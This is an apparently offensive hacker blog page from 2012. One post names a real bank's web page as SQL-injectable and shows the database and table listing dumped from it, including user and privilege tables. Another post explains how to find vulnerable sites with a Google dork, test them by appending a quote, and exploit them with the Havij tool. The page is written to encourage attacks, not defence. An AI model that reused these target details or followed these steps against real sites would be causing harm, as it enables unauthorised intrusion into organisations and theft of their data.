Owner-UnArm3D
Showing posts with label Vulnerablities. Show all posts
Showing posts with label Vulnerablities. Show all posts

Thursday, 25 October 2012

Website Vulnerable --> http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60

Author -- > HUMAN_MIND_CRACKER

Proof of vulnerablity-->

Tables in mysql database -->
available databases [2]:
[*] information_schema
[*] islamidb

Database: islamidb
[74 tables]
+--------------------------+
| annualreport             |
| ar_cat                   |
| area                     |
| articles                 |
| atm                      |
| atm_area                 |
| atm_location             |
| audit_committee          |
| board_of_directors       |
| books                    |
| branchdtls               |
| branches                 |
| chairman_corner          |
| charge_commision         |
| corporate_info           |
| currencyrate             |
| currencyrate0            |
| deposit_scheme           |
| deposit_scheme_info      |
| dept                     |
| disclosure               |
| district                 |
| download                 |
| dynamicsections          |
| email                    |
| eventdetails             |
| eventdetails_11          |
| eventdetails_111         |
| events                   |
| executive_committee      |
| feb_aof_info             |
| feb_crsp_info            |
| feb_csc_info             |
| feb_nrb_info             |
| feb_rema_info            |
| feb_repa_info            |
| fex_graph                |
| interview                |
| investment               |
| jobcategory              |
| jobdetails               |
| keypersonal              |
| link                     |
| link_cat                 |
| management               |
| managementdetails        |
| manager_info             |
| md_corner                |
| md_news                  |
| md_publication           |
| news                     |
| notice                   |
| orderby                  |
| orderplacement           |
| paidup_capital           |
| personnel                |
| photo_album              |
| price_sensative_headline |
| privilege                |
| profit_rate              |
| publication              |
| qryjobs                  |
| rds_perform_details      |
| rds_perform_heading      |
| shariahcouncil           |
| shariahdetails           |
| sme_info                 |
| sme_prd_info             |
| sme_zone                 |
| sponsors                 |
| sysvalues                |
| userrights               |
| users                    |
| video                    |
+--------------------------+

Wednesday, 24 October 2012


Author --> NoEntryPhc
Vulnerability --> SQL Injection
Google Dork --> inurl:customupload.html
Vulnerable Link --> http://www.website.com/customupload.html?category=2

Finding vulnerable site -->

Search inurl:customupload.html in google and you will find many website. Open any of one like i have one link which is given below
Now add ' after link to find the vulnerability of website like this.
I you get any warning message like error in mysql database than website is vulnerable.

Exploting the vulnerability-->

Exploit the vulnerability manually or using software like Haviji
Download Haviji from here
Password for download and archieve is thedarkarea

Category 2

Category 3